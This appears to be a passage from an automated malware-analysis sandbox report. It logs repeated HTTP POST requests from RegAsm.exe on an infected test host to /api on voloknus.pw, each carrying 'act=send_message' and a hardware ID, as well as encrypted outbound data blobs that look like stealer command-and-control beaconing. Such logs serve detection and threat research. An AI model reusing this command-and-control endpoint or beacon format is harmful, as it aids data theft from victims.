Nov 7, 2023 15:21:17.798070908 CET	55	OUT	Data Raw: ab d1 0a 65 4f 4a d7 af 5b 62 c4 7b 11 37 4f 89 62 f2 98 1f 45 75 79 63 79 6d f1 fe 72 e9 ae e7 33 b1 d7 77 5c 24 b2 b0 2f bf 23 4a e7 ce 65 5e 9e 0c 95 8e fb c5 ea de 8d c4 e4 ef 7b ce 4a ca d0 0f b7 c8 8e e7 62 ae ee b9 d1 8a ba 33 6e c6 bf a2 Data Ascii: eOJ[b{7ObEuycymr3w\$/#Je^{Jb3nG5;N,f]FW];rc1!lmB:Gc\|4.*Ph9oR:Rnw#7D_Q][.aP}Lq_dW"eTnc$l;"Yowog
Nov 7, 2023 15:21:17.798768044 CET	59	OUT	Data Raw: b9 eb 6a 5b fc ef be a9 b3 2b ff ab 98 57 34 b3 5e 75 9c 86 fd e1 e4 64 34 74 b2 ac 6e f3 4d c2 15 76 49 90 b8 fd 6c ee b9 4d 54 4b ab ae 13 ab 6e ef 6d ac df 9b b8 95 20 ab 6a 07 c4 47 f9 59 13 73 35 6a 3b df bf 7e 6b 7a b3 7c 53 9f 9a b8 7a ad Data Ascii: j[+W4^ud4tnMvIlMTKnm jGYs5j;~kz\|Sz8=q}Z-OkSnu1sIkU ;X\|Q'['=&<%&'=-3yks%I+J,!(cxXWZ{+>Y]yQQ$\b5{{u2S]
Nov 7, 2023 15:21:18.459106922 CET	60	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=3lu14ss385qpe1olv63l6tmj2e; expires=Sat, 02 Mar 2024 08:07:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ukk3PC0NpLqdbB7tmlrmncgI%2BDZyGfOWgt3F8gBv4y%2BaoKb%2FJQLVG%2B9%2B7iyByfjV2XFFa9RtrOgYZqjY0N6VjbzOcQ799zCZiTYAMe1yP56maPBiLiCSA%2FbMlzYkZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638c9df47ebfa-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:18.459167957 CET	60	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.8	49719	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:18.626897097 CET	61	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:18.627553940 CET	62	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:19.096560001 CET	63	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=jpu7gvg9ebsnbrtbc2gosn09gt; expires=Sat, 02 Mar 2024 08:07:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rP%2Bugjae%2FS7p1BcfnF0R4lmYvJOmvj5%2BMeKNzMZ2GLT4Fx%2B8Hnk9%2Bi2R9U8vGQsXwioSU1oMqLCnvrN9EzSud%2F%2F6nUCyhh7XvfEPSHAzqbipZXcO0wZSibgYMUF47w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638cffe5deb7b-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:19.096628904 CET	63	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.8	49720	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:19.262670994 CET	64	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:19.263679981 CET	64	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:19.763941050 CET	65	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=apnngads3bcjl3klea5s5ghhip; expires=Sat, 02 Mar 2024 08:07:58 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:19 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1fkgk5bgDFRGuTA3o5IcH5XhqU2YodQMz%2FctvjjqBTml77%2B86LT0Fx%2F%2Fmdx%2Bpael4ctZqrmPITH88C%2B7Go5KHwE%2FmIwNHJvBmW0iXxW4MKUuYcbVe13XNgDb%2BEZY7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638d3fe70c4b1-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:19.764008045 CET	65	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.8	49721	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:20.388657093 CET	66	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:20.389355898 CET	67	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:20.866394997 CET	68	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ofsmep2ruh04i1jdtc5vnik7v7; expires=Sat, 02 Mar 2024 08:07:59 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:20 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lWGJ8i6tk3ysXfKaVqY83zYaGZPk7a2sSuddpnv33i6y1f2qght3gPwR9IcNf6lxynEkehKr70M55aelzIgu6Sl15tGBtVQ50sTwKJKxi%2FCyudIIsoZX2o8pnEKSfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638dafe58c3cb-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:20.866480112 CET	68	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.8	49722	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:21.036637068 CET	69	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:21.037358046 CET	69	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:21.476569891 CET	70	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=rfu42d903j2vesg77ibrilc999; expires=Sat, 02 Mar 2024 08:08:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BErRVrS5F307hH72wRLnbTMlmyGmSranRxtYYsQGruQW88rZLXglfJTn%2BNJn7qc2n6%2FMZxfeZjV7g2cGAFJL3YTaBrbUqZkQvw9nVB43rZp12v7IYk6bFV9DNBDGag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638df0b5c30a6-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:21.476593018 CET	70	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.8	49723	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:21.860368967 CET	71	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:21.860368967 CET	72	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:22.349776030 CET	73	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=b8kl2lttm697830f64vl4ub3n2; expires=Sat, 02 Mar 2024 08:08:01 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eQZyTNxn%2BwjzjWXwyh7wadCIbUn%2FHOkiCus1V7kHeN0gNWKZ2o7qnsC%2B9SX809y%2FBvbtptS8RbvEZVT7ulLSvexHq39SrEPnqer6xZsqc1%2BpnRhO%2FdlFYOBFRefXyw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638e43deac735-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:22.349822044 CET	73	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.8	49724	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:23.370007992 CET	74	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:23.370559931 CET	74	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:23.831309080 CET	75	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=dj9tr7ivl3e6pg87qn6alc2p9s; expires=Sat, 02 Mar 2024 08:08:02 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y5P8%2BNcfHaq5XODi%2BHZ6ottCLD0Oo1IitKs9a7J8N9xaXtLk1S8x1DR%2BvJFll%2F%2FDiDBDHlWTTHI3ooEy939DKIn1ooy%2F1tnnHARxgLFMh%2FtciUumwLFr8hb69He9Gw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638eda9e82813-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:23.831345081 CET	76	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.8	49725	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:24.047657967 CET	76	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:24.048326969 CET	77	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:24.562489986 CET	78	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=n5k2tlb3kr12ajctg0dorg303t; expires=Sat, 02 Mar 2024 08:08:03 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CvOgUvAZZq%2BDPrf3e%2FBv5N2YMTU3BCEyvb4VlZaVUblyRUI8Is2q4JyFS8KPKRgWF2kQXOHARaYcGiyFsGy8LiekGELOxxVxYvdr2d2CndFuZbcFV%2FfWYG27jCR5wQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638f1dd65c57e-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:24.562561989 CET	78	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.8	49708	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:10.841923952 CET	17	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:10.842598915 CET	18	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:11.330980062 CET	19	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=gv92vb0c7np0efp56vehjvfk2s; expires=Sat, 02 Mar 2024 08:07:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M9twHIc%2FBnQvLoXoIn9eOFK8rdqlLikoOm6POVEU3zqFBkShuoj7b9eQqzHRhmnvQ13LbfCAz31KYX4RDPXQzjUe8lUmL%2BxSBeXmDKQsl1jN1aa2hy3LRj2fQFBo7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226389f682fc650-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:11.331041098 CET	19	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.8	49726	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:24.768737078 CET	79	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:24.771217108 CET	79	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:25.299312115 CET	81	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=2flls9mpk2um1fe2kn2ne37838; expires=Sat, 02 Mar 2024 08:08:04 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FRQIpeS9wyOeLBk9sk4vkIz0PXpFG52cEUAYTOnQAyzO61xrCqjxoefGPNnv0GDEeKgDzResI8XaEWV0K8T5M%2F4lMIYL492I6NFD8k0QkO3gY5RLZuswP%2Ft4jDx2mg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638f66a65ec54-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:25.299386024 CET	81	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.8	49728	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:25.508270025 CET	82	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
